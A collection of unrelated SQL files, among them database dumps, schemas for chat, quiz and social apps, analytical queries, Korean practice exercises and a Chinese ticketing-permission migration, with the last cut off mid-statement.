AUTO_INCREMENT, AUTO_INCREMENT=2; -- -- AUTO_INCREMENT de la tabla `tbl_movil_session_chats` -- ALTER TABLE `tbl_movil_session_chats` MODIFY `id_session_chat` bigint(20) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4; -- -- AUTO_INCREMENT de la tabla `tbl_movil_tipo_mensajes` -- ALTER TABLE `tbl_movil_tipo_mensajes` MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4; -- -- AUTO_INCREMENT de la tabla `tbl_movil_tipo_notificaciones` -- ALTER TABLE `tbl_movil_tipo_notificaciones` MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4; -- -- AUTO_INCREMENT de la tabla `tbl_movil_tipo_recursos` -- ALTER TABLE `tbl_movil_tipo_recursos` MODIFY `id` bigint(20) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4; -- -- AUTO_INCREMENT de la tabla `tbl_movil_transacciones` -- ALTER TABLE `tbl_movil_transacciones` MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4; -- -- AUTO_INCREMENT de la tabla `tbl_permisos_usuarios` -- ALTER TABLE `tbl_permisos_usuarios` MODIFY `Id_permisos_usuario` bigint(20) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=352; -- -- AUTO_INCREMENT de la tabla `tbl_personas` -- ALTER TABLE `tbl_personas` MODIFY `id_persona` bigint(20) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=159; -- -- AUTO_INCREMENT de la tabla `tbl_roles` -- ALTER TABLE `tbl_roles` MODIFY `Id_rol` bigint(20) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=69; -- -- AUTO_INCREMENT de la tabla `tbl_tipo_docente` -- ALTER TABLE `tbl_tipo_docente` MODIFY `id_tipo_docente` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3; -- -- AUTO_INCREMENT de la tabla `tbl_usuarios` -- ALTER TABLE `tbl_usuarios` MODIFY `Id_usuario` bigint(20) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=76; -- -- Restricciones para tablas volcadas -- -- -- Filtros para la tabla `tbl_movil_bitacora` -- ALTER TABLE `tbl_movil_bitacora` ADD CONSTRAINT `fk_tbl_movil_bitacora_tbl_objetos1` FOREIGN KEY (`objeto_id`) REFERENCES `tbl_objetos` (`Id_objeto`) ON DELETE NO ACTION ON UPDATE CASCADE, ADD CONSTRAINT `fk_tbl_movil_bitacora_tbl_usuarios1` FOREIGN KEY (`usuario_id`) REFERENCES `tbl_usuarios` (`Id_usuario`) ON DELETE NO ACTION ON UPDATE CASCADE; -- -- Filtros para la tabla `tbl_movil_mensajes_chat` -- ALTER TABLE `tbl_movil_mensajes_chat` ADD CONSTRAINT `fk_tbl_movil_mensajes_chat_tbl_movil_session_chats1` FOREIGN KEY (`id_session_chat`) REFERENCES `tbl_movil_session_chats` (`id_session_chat`) ON DELETE NO ACTION ON UPDATE CASCADE, ADD CONSTRAINT `fk_tbl_movil_mensajes_chat_tbl_movil_tipo_mensajes1` FOREIGN KEY (`tipo_mensaje`) REFERENCES `tbl_movil_tipo_mensajes` (`id`) ON DELETE NO ACTION ON UPDATE CASCADE; -- -- Filtros para la tabla `tbl_movil_noticias` -- ALTER TABLE `tbl_movil_noticias` ADD CONSTRAINT `fk_tbl_movil_noticias_tbl_segmentos1` FOREIGN KEY (`segmento_id`) REFERENCES `tbl_movil_segmentos` (`id`) ON DELETE NO ACTION ON UPDATE CASCADE; -- -- Filtros para la tabla `tbl_movil_noticia_recurso` -- ALTER TABLE `tbl_movil_noticia_recurso` ADD CONSTRAINT `fk_tbl_movil_noticia_recurso_tbl_movil_noticias` FOREIGN KEY (`noticia_id`) REFERENCES `tbl_movil_noticias` (`id`) ON DELETE NO ACTION ON UPDATE CASCADE, ADD CONSTRAINT `fk_tbl_movil_noticia_recurso_tbl_movil_tipo_recursos1` FOREIGN KEY (`recurso_id`) REFERENCES `tbl_movil_tipo_recursos` (`id`) ON DELETE NO ACTION ON UPDATE CASCADE; -- -- Filtros para la tabla `tbl_movil_notificaciones` -- ALTER TABLE `tbl_movil_notificaciones` ADD CONSTRAINT `fk_tbl_movil_notificaciones_tbl_movil_segmentos1` FOREIGN KEY (`segmento_id`) REFERENCES `tbl_movil_segmentos` (`id`) ON DELETE NO ACTION ON UPDATE CASCADE, ADD CONSTRAINT `fk_tbl_movil_notificaciones_tbl_movil_tipo_notificaciones1` FOREIGN KEY (`tipo_notificacion_id`) REFERENCES `tbl_movil_tipo_notificaciones` (`id`) ON DELETE NO ACTION ON UPDATE CASCADE; -- -- Filtros para la tabla `tbl_movil_parametros` -- ALTER TABLE `tbl_movil_parametros` ADD CONSTRAINT `fk_tbl_movil_parametros_tbl_usuarios1` FOREIGN KEY (`modificado_por`) REFERENCES `tbl_usuarios` (`Id_usuario`) ON DELETE NO ACTION ON UPDATE CASCADE; -- -- Filtros para la tabla `tbl_movil_segmento_usuario` -- ALTER TABLE `tbl_movil_segmento_usuario` ADD CONSTRAINT `fk_tbl_movil_segmento_usuario_tbl_movil_segmentos1` FOREIGN KEY (`segmento_id`) REFERENCES `tbl_movil_segmentos` (`id`) ON DELETE NO ACTION ON UPDATE CASCADE, ADD CONSTRAINT `fk_tbl_movil_segmento_usuario_tbl_usuarios1` FOREIGN KEY (`usuario_id`) REFERENCES `tbl_usuarios` (`Id_usuario`) ON DELETE NO ACTION ON UPDATE CASCADE; -- -- Filtros para la tabla `tbl_movil_session_chats` -- ALTER TABLE `tbl_movil_session_chats` ADD CONSTRAINT `fk_tbl_movil_session_chats_tbl_usuarios1` FOREIGN KEY (`id_usuario1`) REFERENCES `tbl_usuarios` (`Id_usuario`) ON DELETE NO ACTION ON UPDATE CASCADE, ADD CONSTRAINT `fk_tbl_movil_session_chats_tbl_usuarios2` FOREIGN KEY (`id_usuario2`) REFERENCES `tbl_usuarios` (`Id_usuario`) ON DELETE NO ACTION ON UPDATE CASCADE; -- -- Filtros para la tabla `tbl_personas` -- ALTER TABLE `tbl_personas` ADD CONSTRAINT `FK_tbl_personas_tbl_tipo_docente` FOREIGN KEY (`id_tipo_docente`) REFERENCES `tbl_tipo_docente` (`id_tipo_docente`), ADD CONSTRAINT `FK_tbl_personas_tbl_tipos_persona` FOREIGN KEY (`id_tipo_persona`) REFERENCES `tbl_tipos_persona` (`id_tipo_persona`), ADD CONSTRAINT `tbl_personas_tbl_tipos_persona_id_tipo_persona_fk` FOREIGN KEY (`id_tipo_persona`) REFERENCES `tbl_tipos_persona` (`id_tipo_persona`); -- -- Filtros para la tabla `tbl_usuarios` -- ALTER TABLE `tbl_usuarios` ADD CONSTRAINT `FK_tbl_usuarios_tbl_roles` FOREIGN KEY (`Id_rol`) REFERENCES `tbl_roles` (`Id_rol`), ADD CONSTRAINT `FKpersonas_usuario` FOREIGN KEY (`id_persona`) REFERENCES `tbl_personas` (`id_persona`); COMMIT; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/* SQLyog Ultimate v11.11 (64 bit) MySQL - 5.5.40 : Database - ichat ********************************************************************* */ /*!40101 SET NAMES utf8 */; /*!40101 SET SQL_MODE=''*/; /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; /*Table structure for table `t_room` */ DROP TABLE IF EXISTS `t_room`; CREATE TABLE `t_room` ( `room_id` int(10) NOT NULL AUTO_INCREMENT COMMENT '群id', `uuid` varchar(64) NOT NULL COMMENT '群uuid', `room_name` varchar(100) NOT NULL COMMENT '群名称', `room_desc` varchar(255) DEFAULT NULL COMMENT '群介绍', `create_time` int(10) NOT NULL COMMENT '创建时间', `status` tinyint(4) NOT NULL DEFAULT '1' COMMENT '0:已删除 1:正常', PRIMARY KEY (`room_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; /*Data for the table `t_room` */ /*Table structure for table `t_room_user` */ DROP TABLE IF EXISTS `t_room_user`; CREATE TABLE `t_room_user` ( `id` int(10) NOT NULL AUTO_INCREMENT, `room_id` int(10) NOT NULL, `nick_name` varchar(50) DEFAULT NULL COMMENT '群名片', `uid` int(10) NOT NULL, `is_owner` tinyint(2) NOT NULL DEFAULT '0' COMMENT '是否是群主', `create_time` int(10) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; /*Data for the table `t_room_user` */ /*Table structure for table `t_user` */ DROP TABLE IF EXISTS `t_user`; CREATE TABLE `t_user` ( `uid` int(10) NOT NULL AUTO_INCREMENT COMMENT '用户id', `uuid` varchar(64) NOT NULL COMMENT '用户uuid和主键一一对应', `login_name` varchar(20) NOT NULL COMMENT '用户登录名', `password` varchar(64) NOT NULL COMMENT '用户登录密码', `user_name` varchar(20) DEFAULT NULL COMMENT '用户昵称', `create_time` int(10) NOT NULL COMMENT '创建时间', `role_id` int(10) NOT NULL DEFAULT '5' COMMENT '用户角色,5为普通用户', `signature` varchar(255) DEFAULT NULL COMMENT '用户签名', `avatar` varchar(255) DEFAULT NULL COMMENT '用户头像', `email` varchar(100) DEFAULT NULL COMMENT '用户邮箱', `status` tinyint(4) NOT NULL DEFAULT '1' COMMENT '用户状态 1:正常 0:删除 2:拉黑', PRIMARY KEY (`uid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; /*Data for the table `t_user` */ /*Table structure for table `t_user_relate` */ DROP TABLE IF EXISTS `t_user_relate`; CREATE TABLE `t_user_relate` ( `id` int(10) NOT NULL AUTO_INCREMENT, `uid` int(10) NOT NULL, `relate_uid` int(10) NOT NULL, `create_time` int(10) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; /*Data for the table `t_user_relate` */ /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
drop table if exists spittle; drop table if exists spitter; create table info ( id int PRIMARY KEY AUTO_INCREMENT, name varchar(25) not null, email varchar(25) not null );
CREATE TABLE MCQ.QUESTIONS ( QUESTION_ID INTEGER NOT NULL UNIQUE GENERATED ALWAYS AS IDENTITY (START WITH 1, INCREMENT BY 1), QUESTION_TEXT VARCHAR(512) NOT NULL, MULTIPLE_CHOICES SMALLINT NOT NULL DEFAULT 0 ); CREATE UNIQUE INDEX QUESTIONS_INDEX ON MCQ.QUESTIONS (QUESTION_ID); CREATE TABLE MCQ.CHOICES ( CHOICE_ID INTEGER NOT NULL UNIQUE GENERATED ALWAYS AS IDENTITY (START WITH 1, INCREMENT BY 1), CHOICE_TEXT VARCHAR(256) NOT NULL, QUESTION_ID INTEGER NOT NULL ); CREATE UNIQUE INDEX CHOICES_INDEX ON MCQ.CHOICES(CHOICE_ID); CREATE TABLE MCQ.ANSWERS ( ANSWER_ID INTEGER NOT NULL UNIQUE GENERATED ALWAYS AS IDENTITY (START WITH 1, INCREMENT BY 1), NAME VARCHAR(128), QUESTION_ID INTEGER NOT NULL ); CREATE UNIQUE INDEX ANSWERS_INDEX ON MCQ.ANSWERS(ANSWER_ID); CREATE TABLE MCQ.ANSWERS_CHOICES ( ANSWER_ID INTEGER NOT NULL, CHOICE_ID INTEGER NOT NULL ); CREATE UNIQUE INDEX ANSWERS_CHOICES_INDEX ON MCQ.ANSWERS_CHOICES (ANSWER_ID, CHOICE_ID); ALTER TABLE MCQ.CHOICES ADD FOREIGN KEY (QUESTION_ID) REFERENCES MCQ.QUESTIONS(QUESTION_ID); ALTER TABLE MCQ.ANSWERS ADD FOREIGN KEY (QUESTION_ID) REFERENCES MCQ.QUESTIONS(QUESTION_ID); ALTER TABLE MCQ.ANSWERS_CHOICES ADD FOREIGN KEY (ANSWER_ID) REFERENCES MCQ.ANSWERS(ANSWER_ID); ALTER TABLE MCQ.ANSWERS_CHOICES ADD FOREIGN KEY (CHOICE_ID) REFERENCES MCQ.CHOICES(CHOICE_ID);
-- ZUSATZANFRAGE 'FRAUENBONUS' --(Frauenquote gewählte Direktkandidaten) / (Frauenquote Direktkandidaten) -- => Ist dieser Wert größer als 1 => „Frauenbonus“, sonst: „Männerbonus“ WITH geschlechtGewaehlteKandidaten(wahljahr, geschlecht, anzahl) AS ( SELECT gk.wahljahr, k.geschlecht, count(*) FROM kandidaten k, gewaehlte_erstkandidaten_schnell gk WHERE k.id = gk.kandidat_id GROUP BY k.geschlecht, gk.wahljahr ) SELECT wahljahr, ( CAST(anzahl AS NUMERIC) / ( SELECT SUM(anzahl) FROM geschlechtGewaehlteKandidaten gk2 WHERE gk2.wahljahr = gk.wahljahr AND gk2.geschlecht is not null ) ) / ( CAST(( SELECT count(*) FROM kandidaten k WHERE k.geschlecht = 'w' AND k.wahlkreis_id IS NOT NULL AND k.wahljahr = gk.wahljahr ) AS NUMERIC) / ( SELECT count(*) FROM kandidaten k WHERE k.wahlkreis_id IS NOT NULL AND k.geschlecht is not null AND k.wahljahr = gk.wahljahr ) ) AS CHANCE_FRAUEN_GEWAEHLT_ZU_WERDEN FROM geschlechtGewaehlteKandidaten gk WHERE geschlecht = 'w';
CREATE OR ALTER PROCEDURE T7Library.RankLibraries @StartDate DATE, @EndDate DATE AS SELECT L.LocationId, L.StreetAddress + N', ' + L.City + N' ' + L.StateCode AS [Location], COUNT(DISTINCT C.CheckoutId) AS Checkouts, RANK() OVER(ORDER BY COUNT(DISTINCT C.CheckoutId) DESC) AS [Rank] FROM T7Library.[Location] L INNER JOIN T7Library.Checkout C ON L.LocationId = C.LocationId WHERE C.OutDate BETWEEN @StartDate AND @EndDate GROUP BY L.LocationId, L.StreetAddress + N', ' + L.City + N' ' + L.StateCode ORDER BY RANK() OVER(ORDER BY COUNT(DISTINCT C.CheckoutId) DESC);
Use LightFinanceDW; Update dbo.DimAccount SET isCurrent='False' where AccountKey = ?;
insert into Client values(10003,'20.363','Cesar', '16.000' , 'B');
use Company; insert into Leads select 'Peter', 'Phelps', '', 'peter.phelps@gmail.com', '39885023252', 0, '10-20-2020', '09-08-1987'; insert into Leads select 'Mark', 'Stevens', '', 'mark.stevens@gmail.com', '46181031458', 0, '10-20-2020', '09-01-1998'; insert into Leads select 'Aubrey', 'Tucker', '', 'aubrey.tucker@gmail.com', '719603281922', 0, '10-20-2020', '12-02-1999'; insert into Leads select 'Thomas', 'Logan', '', 'thomas.logan@gmail.com', '82608994321', 0, '10-20-2020', '07-12-1980'; insert into Leads select 'Frank', 'Bridges', '', 'frank.bridges@gmail.com', '070302006337', 0, '10-20-2020', '06-27-1990'; insert into Tags select 'New', 'Light gray'; insert into Tags select 'Regular', 'Light green'; insert into Tags select 'Cold', 'Light blue'; insert into Tags select 'Hot', 'Light red'; insert into LeadTags select 1, 1; insert into LeadTags select 2, 1; insert into LeadTags select 2, 3; insert into LeadTags select 3, 1; insert into LeadTags select 4, 1; insert into LeadTags select 5, 1; insert into Services select 'Cleaning of the apartment', '', 5000, 10, 60; insert into Services select 'Garbage removal', '', 100, 10, 5; insert into Appointments select 1, 1, '10-27-2020 15:00:00', ''; insert into Appointments select 3, 1, '10-21-2020 16:30:00', ''; insert into Appointments select 3, 1, '11-18-2020 16:30:00', ''; insert into Appointments select 5, 2, '10-21-2020 14:00:00', '';
CREATE TABLE IF NOT EXISTS kt.user( `user_id` INT(11) NOT NULL PRIMARY KEY AUTO_INCREMENT, `user_handle` VARCHAR (255) UNIQUE NOT NULL, `user_mail_address` VARCHAR (255) UNIQUE NOT NULL, `user_password` VARCHAR (255) NOT NULL, `user_content` JSON NOT NULL, CHECK (JSON_VALID(user_content)) ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; CREATE TABLE IF NOT EXISTS kt.post( `post_id` INT (11) NOT NULL PRIMARY KEY AUTO_INCREMENT, `post_user_id` INT (11) NOT NULL, `post_content` JSON NOT NULL, `post_geo` GEOMETRY NOT NULL, `post_date` DATETIME NOT NULL, CONSTRAINT fk_post_user_id FOREIGN KEY (`post_user_id`) REFERENCES `user` (`user_id`) ON DELETE RESTRICT ON UPDATE RESTRICT, CHECK (JSON_VALID(post_content)) ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; CREATE TABLE IF NOT EXISTS kt.location( `location_id` INT (11) NOT NULL PRIMARY KEY AUTO_INCREMENT, `location_user_id` INT (11) NOT NULL, `location_content` JSON NOT NULL, `location_geo` GEOMETRY NOT NULL, `location_date` DATETIME NOT NULL, CONSTRAINT fk_location_user_id FOREIGN KEY (`location_user_id`) REFERENCES `user` (`user_id`) ON DELETE RESTRICT ON UPDATE RESTRICT, CHECK (JSON_VALID(location_content)) ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
-- Selection queries. SELECT * FROM STATIC_CONFIGURATION; SELECT * FROM SOC_MUL_USER; SELECT * FROM MULTIPLICATION; SELECT * FROM MULTIPLICATION_RESULT_ATTEMPT; -- Drop Table Commands. DELETE FROM MULTIPLICATION_RESULT_ATTEMPT; DELETE FROM SOC_MUL_USER; DELETE FROM MULTIPLICATION; DELETE FROM STATIC_CONFIGURATION; INSERT INTO STATIC_CONFIGURATION(CONFIGURATION_NAME, CONFIGURATION_VALUE) VALUES('USER_ID_COUNT', 0) INSERT INTO STATIC_CONFIGURATION(CONFIGURATION_NAME, CONFIGURATION_VALUE) VALUES('MULTIPLICATION_ID_COUNT', 0); INSERT INTO STATIC_CONFIGURATION(CONFIGURATION_NAME, CONFIGURATION_VALUE) VALUES('MRA_ID', 0); DROP TABLE SOC_MUL_USER; DROP TABLE MULTIPLICATION; DROP TABLE MULTIPLICATION_RESULT_ATTEMPT; DROP TABLE STATIC_CONFIGURATION;
DROP SCHEMA IF EXISTS etl CASCADE; CREATE SCHEMA etl;
DELETE FROM SHOP_ITEMS S WHERE S.ID = 42069; DELETE FROM SHOP_ITEMS S WHERE S.ID = 6969; DELETE FROM SHOP_ITEMS S WHERE S.ID = 420420; DELETE FROM SHOP_ITEMS S WHERE S.ID = 69420;
/* Use our created db */ USE employee_trackerDB; /* Create table with id that auto increments, and name */ CREATE TABLE departments ( dep_id INT NOT NULL AUTO_INCREMENT, name VARCHAR(30) NOT NULL, PRIMARY KEY (dep_id) );
 --consulta de matriculas select * from sc_cad.tbl_fnc limit 1 select * from sc_cad.tbl_fnc where cd_emp = 699 and nr_idt_fnc like '00%' and st_fnc = 1;
select * from book b, orders o,customer c where b.bookid = o.bookid and o.custid = c.custid; -- 박지성의 총 구매액 select sum(saleprice) from customer c, orders o where c.custid = o.custid and c.name = '박지성'; -- 박지성이 구매한 도서의 수 select count(*) from customer c, orders o where c.custid = o.custid and c.name = '박지성'; -- 가격이 20,000인 도서를 주문한 고객명과 도서명을 구하시오 select c.name,b.bookname from book b,customer c,orders o where b.bookid = o.bookid and c.custid = o.custid and b.price = 20000; -- subquery -- 도서를 구매한 적이 있는 고객명 검색 select * from customer where custid in (select custid from orders); select * from customer where custid not in(select custid from orders) and name = '박지성'; -- 대한미디어에서 출판한 도서를 구매한 고객명을 보여라. select name from customer where custid in (select custid from orders where bookid in (select bookid from book where publisher = '대한미디어')); --1 마당서점의 고객이 요구하는 다음 질문에 대해 SQL 문을 작성하시오. -- (1) 박지성이 구매한 도서의 출판사 수 select count(distinct publisher) from book b, orders o where b.bookid = o.bookid and custid = (select custid from customer where name = '박지성'); select count(*) from customer c , orders o where c.custid , o.orders and c.name = '박지성' -- (2) 박지성이 구매한 도서의 이름, 가격, 정가와 판매가격의 차이 -- (3) 박지성이 구매하지 않은 도서의 이름 select bookname from book where not in; select * from book,orders; -- 2 마당서점의 운영자와 경영자가 요구하는 다음 질문에 대해 SQL 문을 작성하시오. -- (4) 주문하지 않은 고객의 이름(부속질의 사용) select * from customer where custid not in(select custid from orders); -- (5) 주문 금액의 총액과 주문의 평균 금액 select sum(saleprice),avg(saleprice) from customer c, orders o where c.custid = o.custid; -- and c.name = '박지성'; -- (6) 고객의 이름과 고객별 구매액 select * from customer; select * from orders; select name -- (7) 고객의 이름과 고객이 구매한 도서 목록 -- (8) 도서의 가격(Book 테이블)과 판매가격(Orders 테이블)의 차이가 가장 많은 주문 select -- (9) 도서의 판매액 평균보다 자신의 구매액 평균이 더 높은 고객의 이름 -- (10) 박지성이 구매한 도서의 출판사와 같은 출판사에서 도서를 구매한 고객명(심화) -- (11) 두개 이상 서로 다른 출판사에서 도서를 구매한 고객명 (심화)
-- (PART ONE) USE ISDHospital SELECT dp.departNum, wh.doctorID, SUM(ROUND(((DATEDIFF(MINUTE, begWH, endWH) - DATEDIFF(MINUTE, begBreak, endBreak)) / 60.0), 1)) AS [total hours] FROM workingHours AS wh INNER JOIN doctor AS d ON d.doctorID = wh.doctorID INNER JOIN department AS dp ON d.departmentID = dp.departNum WHERE DATEDIFF(MONTH, wh.begWH, GETDATE()) <= 3 GROUP BY dp.departNum, wh.doctorID ORDER BY dp.departNum -- (PART TWO) USE ISDHospital SELECT TOP 1 diagnosis, beginning FROM appointment WHERE DATEDIFF(MONTH, beginning, GETDATE()) <= 3 ORDER BY COUNT(diagnosis) OVER (PARTITION BY diagnosis) DESC, diagnosis DESC
create table users ( id serial primary key, user_name text auth_id int )
@repeat{SELECT COUNT(*) FROM functionpermissionreg WHERE id=1010} insert into functionpermissionreg values(1010,13,'原票号重打他人车票','{ABB9C812-710D-4037-948C-0B925BBE1F47}','',sysdate,0,sysdate,0); @repeat{SELECT COUNT(*) FROM functionpermissionreg WHERE id=1011} insert into functionpermissionreg values(1011,13,'换票号重打他人车票','{CCF8DE9B-3AE5-4518-8713-36C73166CE6B}','',sysdate,0,sysdate,0); --begin 2017-03-02 yeqiming 自助发班增加发班打印权限按钮 @repeat{SELECT COUNT(*) FROM functionpermissionreg WHERE id=1012} insert into functionpermissionreg values(1012,519,'发班打印','{BF1F07F5-B615-4147-A0EF-CF624DD650E8}','',sysdate,0,sysdate,0); --end 2017-03-02 yeqiming 自助发班增加发班打印权限按钮 --begin孙越 2017年3月27日 11:15:46 -- @repeat{SELECT COUNT(*) FROM functionreg where id=17032701 } insert into functionreg (ID, PACKAGENAME, NAME, FUNCTIONKEY, FUNCTIONDESCRIBE, PARAMETERDESCRIBE, CREATETIME, CREATEBY, UPDATETIME, UPDATEBY) values (17032701, 'CustomerBuyTicketSituation.bpl', '旅客购票情况统计', '{0E737AAE-E961-45AA-A2D5-79851DD50091}', '旅客购票情况统计', null, sysdate, '0',sysdate, '0'); @repeat{SELECT COUNT(*) FROM menu where id=17032701 } insert into menu (ID, NAME, FUNCTIONREGID, GRADE, ORDERNO, PARENTID, PARAMETER, CREATETIME, CREATEBY, UPDATETIME, UPDATEBY, CLICKNUM, CLAZZ, URL, ICON, SYSTYPE, MENUTYPE) values (17032701, '旅客购票情况统计', 17032701, 3, 33.00, 300, null, sysdate, 0, sysdate, 0, 0, null, null, null, '0', '1'); --end-- --begin maxiao 2017年3月31日 11:15:46 -- @repeat{SELECT COUNT(*) FROM functionpermissionreg where id=411655 } insert into functionpermissionreg (ID, FUNCTIONREGID, PERMISSIONNAME, PERMISSIONKEY, PERMISSIONDESCRIBE, CREATETIME, CREATEBY, UPDATETIME, UPDATEBY) values (411655, 98, '身份证信息是否显示全部', '{D5D6855E-FBF8-4CB6-BF8C-B198C1169769}', '', sysdate, 0, sysdate, 0); @repeat{SELECT COUNT(*) FROM functionpermissionreg where id=411657 } insert into functionpermissionreg (ID, FUNCTIONREGID, PERMISSIONNAME, PERMISSIONKEY, PERMISSIONDESCRIBE, CREATETIME, CREATEBY, UPDATETIME, UPDATEBY) values (411657, 85, '删除按钮权限', '{F1A6D504-7E1D-479B-B295-4821B3332786}', '', sysdate, 0, sysdate, 0); @repeat{SELECT COUNT(*) FROM functionpermissionreg where id=411656 } insert into functionpermissionreg (ID, FUNCTIONREGID, PERMISSIONNAME, PERMISSIONKEY, PERMISSIONDESCRIBE, CREATETIME, CREATEBY, UPDATETIME, UPDATEBY) values (411656, 145, '身份证信息是否显示全部', '{C274233F-954C-45D1-BF63-A974D9366CF9}', '', sysdate, 0, sysdate, 0); @repeat{SELECT COUNT(*) FROM functionpermissionreg where id=411658 } insert into functionpermissionreg (ID, FUNCTIONREGID, PERMISSIONNAME, PERMISSIONKEY, PERMISSIONDESCRIBE, CREATETIME, CREATEBY, UPDATETIME, UPDATEBY) values (411658, 80, '添加', '{4B878C87-242F-402D-9994-7B4C7F6E65DD}', '', sysdate, 0, sysdate, 0); @repeat{SELECT COUNT(*) FROM functionpermissionreg where id=411659 } insert into functionpermissionreg (ID, FUNCTIONREGID, PERMISSIONNAME, PERMISSIONKEY, PERMISSIONDESCRIBE, CREATETIME, CREATEBY, UPDATETIME, UPDATEBY) values (411659, 80, '修改', '{C1CC4C7C-7904-4AA5-A77D-290F63B47A92}', '', sysdate, 0, sysdate, 0); @repeat{SELECT COUNT(*) FROM functionpermissionreg where id=411660 } insert into functionpermissionreg (ID, FUNCTIONREGID, PERMISSIONNAME, PERMISSIONKEY, PERMISSIONDESCRIBE, CREATETIME, CREATEBY, UPDATETIME, UPDATEBY) values (411660, 80, '删除', '{0A5A8C39-BFA4-4238-8B43-EF191AB2CF71}', '', sysdate, 0, sysdate, 0); @repeat{SELECT COUNT(*) FROM functionpermissionreg where id=411661 } insert into functionpermissionreg (ID, FUNCTIONREGID, PERMISSIONNAME, PERMISSIONKEY, PERMISSIONDESCRIBE, CREATETIME, CREATEBY, UPDATETIME, UPDATEBY) values (411661, 80, '导出excel', '{D513BB80-C8F3-4903-A836-DC27E0AA1059}', '', sysdate, 0, sysdate, 0); @repeat{SELECT COUNT(*) FROM functionpermissionreg where id=411662 } insert into functionpermissionreg (ID, FUNCTIONREGID, PERMISSIONNAME, PERMISSIONKEY, PERMISSIONDESCRIBE, CREATETIME, CREATEBY, UPDATETIME, UPDATEBY) values (411662, 80, '打印', '{39F011C1-4AB7-4053-A56A-42E82EDE800A}', '', sysdate, 0, sysdate, 0); @repeat{SELECT COUNT(*) FROM functionpermissionreg where id=411663 } insert into functionpermissionreg (ID, FUNCTIONREGID, PERMISSIONNAME, PERMISSIONKEY, PERMISSIONDESCRIBE, CREATETIME, CREATEBY, UPDATETIME, UPDATEBY) values (411663, 80, '身份证信息是否显示全部', '{EBB2B7AF-64C0-4C77-B029-01CD3ABC2610}', '', sysdate, 0, sysdate, 0); --end-- --begin 孙越 2017年3月28日 15:10:16 添加按钮权限-- @repeat{SELECT COUNT(*) FROM functionpermissionreg where id=17032801 } insert into functionpermissionreg t (id, functionregid, permissionname, permissionkey, permissiondescribe, createtime, createby, updatetime, updateby ) values(17032801,36,'登记他人票据','{FAEC8175-9C13-4FD5-B771-F1CEC36665F8}','登记他人票据',sysdate,0,sysdate,0); @repeat{SELECT COUNT(*) FROM functionpermissionreg where id=17032802 } insert into functionpermissionreg t (id, functionregid, permissionname, permissionkey, permissiondescribe, createtime, createby, updatetime, updateby ) values(17032802,36,'登记之前坏票','{1F46D72F-4578-4096-A009-6CD221612C06}','登记之前坏票',sysdate,0,sysdate,0); --end-- --更新9898参数默认是0 @repeat{SELECT COUNT(*) FROM parameter where id=0 } update parameter t set t.value='0' where t.code='9898'; @repeat{SELECT COUNT(*) FROM parameter where id=0 } update parameterorgdetail t set t.value='0' where t.parameterid=9898; @repeat{SELECT 1-COUNT(*) FROM menu where name like '%网售机构不可售班次控制%' } delete from menupermission t where t.menuid in (select id from menu where name like '%网售机构不可售班次控制%'); @repeat{SELECT 1-COUNT(*) FROM menu where name like '%网售机构不可售班次控制%' } delete from menu where name like '%网售机构不可售班次控制%'; --add by tianhb-begin 2017年4月28日 结算单模板增加打印方式(补录单子打印时显示补录字样) @repeat{SELECT COUNT(*) FROM printtemplatetypeitem where id=410 } insert into printtemplatetypeitem (ID, PRINTTEMPLATETYPEID, ITEMNAME, ITEMTYPE, ITEMCODE, ISLIST) values (410, 4, '打印方式', '0', 'printway', 0); --add by tianhb-end 2017年4月28日 结算单模板增加打印方式(补录单子打印时显示补录字样) --begin 孙越 2017年5月8日 10:33:33 增加打印项 -- @repeat{SELECT COUNT(*) FROM printtemplatetypeitem where id=17050801 } insert into printtemplatetypeitem (ID, PRINTTEMPLATETYPEID, ITEMNAME, ITEMTYPE, ITEMCODE, ISLIST) values (17050801, 1, '改签原票号', '0', 'oldticketno', 0); @repeat{SELECT COUNT(*) FROM printtemplatetypeitem where id=17050802 } insert into printtemplatetypeitem (ID, PRINTTEMPLATETYPEID, ITEMNAME, ITEMTYPE, ITEMCODE, ISLIST) values (17050802, 1, '改签原班次号', '0', 'oldschedulecode', 0); --end-- --begin 孙越 2017年5月24日 10:55:49 增加权限 -- @repeat{SELECT COUNT(*) FROM functionpermissionreg where id=17052401 } insert into functionpermissionreg (ID, FUNCTIONREGID, PERMISSIONNAME, PERMISSIONKEY, PERMISSIONDESCRIBE, CREATETIME, CREATEBY, UPDATETIME, UPDATEBY) values (17052401, 98, '打印权限', '{7A89423F-9747-4C53-9114-1EAA4F55D67F}', '', sysdate, 0, sysdate, 0); @repeat{SELECT COUNT(*) FROM functionpermissionreg where id=17052402 } insert into functionpermissionreg (ID, FUNCTIONREGID, PERMISSIONNAME, PERMISSIONKEY, 